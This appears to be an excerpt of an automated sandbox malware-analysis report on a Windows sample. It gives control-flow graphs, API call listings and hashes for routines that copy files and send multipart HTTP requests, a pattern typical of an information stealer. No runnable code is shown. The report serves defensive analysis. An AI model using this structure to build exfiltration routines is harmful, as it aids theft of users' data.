                                                                                                                                                                                                                                                                                        • Opcode ID: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                                                                        • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c 
InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 817 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->817 817->814
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 004056C3
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,044035E0,00000000,?,044076E0,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                                                                        • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 148854478-1022722094
                                                                                                                                                                                                                                                                                        • Opcode ID: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                                                                        • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2228671196-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                                                                        • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,04402B50,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                                                                        • Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 1666 404540-404602 call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 1681 404604 1666->1681 1682 40460b-40460f 1666->1682 1681->1682 1683 404615-40478d call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 1682->1683 1684 404b8b-404bb3 InternetCloseHandle call 4170d0 call 4094a0 1682->1684 1683->1684 1770 404793-404797 1683->1770 1693 404bf2-404c62 call 415070 * 2 call 416da0 call 416e00 * 8 1684->1693 1694 404bb5-404bed call 416e20 call 416fb0 call 416ea0 call 416e00 1684->1694 1694->1693 1771 4047a5 1770->1771 1772 404799-4047a3 1770->1772 1773 4047af-4047e2 HttpOpenRequestA 1771->1773 1772->1773 1774 4047e8-404ae8 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416d40 call 416f20 * 2 call 416ea0 call 416e00 * 2 call 4170d0 lstrlen call 4170d0 * 2 lstrlen call 4170d0 HttpSendRequestA 1773->1774 1775 404b7e-404b85 InternetCloseHandle 1773->1775 1886 404af2-404b1c InternetReadFile 1774->1886 1775->1684 1887 404b27-404b79 
InternetCloseHandle call 416e00 1886->1887 1888 404b1e-404b25 1886->1888 1887->1775 1888->1887 1889 404b29-404b67 call 416fb0 call 416ea0 call 416e00 1888->1889 1889->1886
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                                                          • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,044035B0), ref: 004045FA
                                                                                                                                                                                                                                                                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04403720), ref: 00404AA8
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
                                                                                                                                                                                                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
                                                                                                                                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B6D
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B85
                                                                                                                                                                                                                                                                                        • HttpOpenRequestA.WININET(00000000,044035D0,?,04407F88,00000000,00000000,00400100,00000000), ref: 004047D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404B8F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                                                                                                                                                                                                                        • String ID: "$"$------$------$------$J&f
                                                                                                                                                                                                                                                                                        • API String ID: 460715078-2398766951
                                                                                                                                                                                                                                                                                        • Opcode ID: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                                                                        • Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,043EC0B8,00000000,00020019,00000000,0041D289), ref: 00414B41
                                                                                                                                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                                                                                                                                                                                                                                                        • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                        • API String ID: 3246050789-3278919252
                                                                                                                                                                                                                                                                                        • Opcode ID: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                                                                        • Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040F667
                                                                                                                                                                                                                                                                                        • strtok_s.MSVCRT ref: 0040FA8F
